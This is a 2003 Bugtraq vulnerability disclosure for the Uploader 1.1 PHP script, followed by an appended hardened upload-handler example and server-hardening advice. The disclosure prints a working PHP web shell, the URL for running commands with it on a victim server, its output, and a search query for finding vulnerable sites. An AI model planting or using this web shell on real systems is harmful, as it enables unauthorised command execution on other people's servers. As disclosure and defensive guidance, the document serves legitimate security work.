Date: Tue, 4 Mar 2003 01:15:47 +0100 (MET)
From: kingcope@....net
To: bugtraq@...urityfocus.com
Subject: uploader.php vulnerability

Uploader Version 1.1, which is available from http://www.phpscriptcenter.com/uploader.php, includes "uploader.php", which lets you upload ANY file (even scripts, e.g. in PHP) onto the server if no password protection is specified in the configuration file (default set to off). The supplied files will be uploaded into directory "uploads" if not otherwise configured.

So if we create a file like this:

    <?php
    $cmd = $_GET["cmd"];
    system("$cmd");
    ?>

and upload it as "shellemul.php", we can execute commands by targeting our browser to

    http://www.victim.com/uploads/shellemul.php?cmd=id

which will give us -->

    uid=48(apache) gid=48(apache) groups=48(apache)

We could even upload PHPShell and have more comfortable fun.

---
Google gets me 411 hits for "allinurl: uploader.php"
---

by kcope (kingcope@....net)

--
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Please smile! Photo gallery online with GMX without your own homepage!
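The root causes described in the post are an upload handler that is anonymous by default, accepts any file type, and writes into a directory the web server executes scripts from. The following is an added example of what a hardened PHP upload handler looks like; it is not code from the post or from the Uploader script, and the upload directory path, size limit, allow-list and session field name are illustrative assumptions.

```php
<?php
// Added example (not from the original post or the Uploader script):
// a hardened file upload handler. The path, size limit, allow-list and
// session key below are assumed values chosen for illustration.
declare(strict_types=1);

// 1. Require an authenticated session. Anonymous upload must not be the default.
session_start();
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('Authentication required.');
}

// 2. Store files OUTSIDE the document root so the web server never executes
//    an uploaded file, even if the content checks below are bypassed.
const UPLOAD_DIR = '/var/app/uploads_private'; // assumed path, not served by httpd
const MAX_BYTES  = 2 * 1024 * 1024;            // assumed 2 MiB limit

// 3. Allow-list: permitted extensions and the MIME type each must sniff as.
const ALLOWED = [
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'pdf' => 'application/pdf',
];

if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_FILES['file'])) {
    http_response_code(400);
    exit('No file.');
}
$f = $_FILES['file'];
if ($f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
    http_response_code(400);
    exit('Upload failed.');
}
if ($f['size'] > MAX_BYTES) {
    http_response_code(413);
    exit('File too large.');
}

// 4. Take the extension from the client name but never trust the client's
//    declared MIME type; sniff the actual content with finfo instead.
$ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
if (!isset(ALLOWED[$ext])) {
    http_response_code(415);
    exit('File type not allowed.');
}
$finfo    = new finfo(FILEINFO_MIME_TYPE);
$detected = $finfo->file($f['tmp_name']);
if ($detected !== ALLOWED[$ext]) {
    http_response_code(415);
    exit('Content does not match extension.');
}

// 5. Generate the stored name server-side: no user-controlled filename,
//    so no "shell.php", no double extensions and no path traversal.
$stored = bin2hex(random_bytes(16)) . '.' . $ext;
$dest   = UPLOAD_DIR . DIRECTORY_SEPARATOR . $stored;
if (!move_uploaded_file($f['tmp_name'], $dest)) {
    http_response_code(500);
    exit('Could not store file.');
}
chmod($dest, 0640); // not executable, not world-readable

// 6. Keep an audit trail of who uploaded what, for detection and response.
error_log(sprintf('upload user=%s orig=%s stored=%s type=%s',
    $_SESSION['user_id'], basename($f['name']), $stored, $detected));

echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
```

If uploaded files have to be downloadable, serve them through a separate script that reads from the private directory and sends them with a fixed Content-Type and a Content-Disposition: attachment header, rather than exposing the directory itself. Where moving the directory out of the document root is not possible, disable script execution for it in the web server configuration (for example `php_admin_flag engine off` in an Apache directory block) as a second layer.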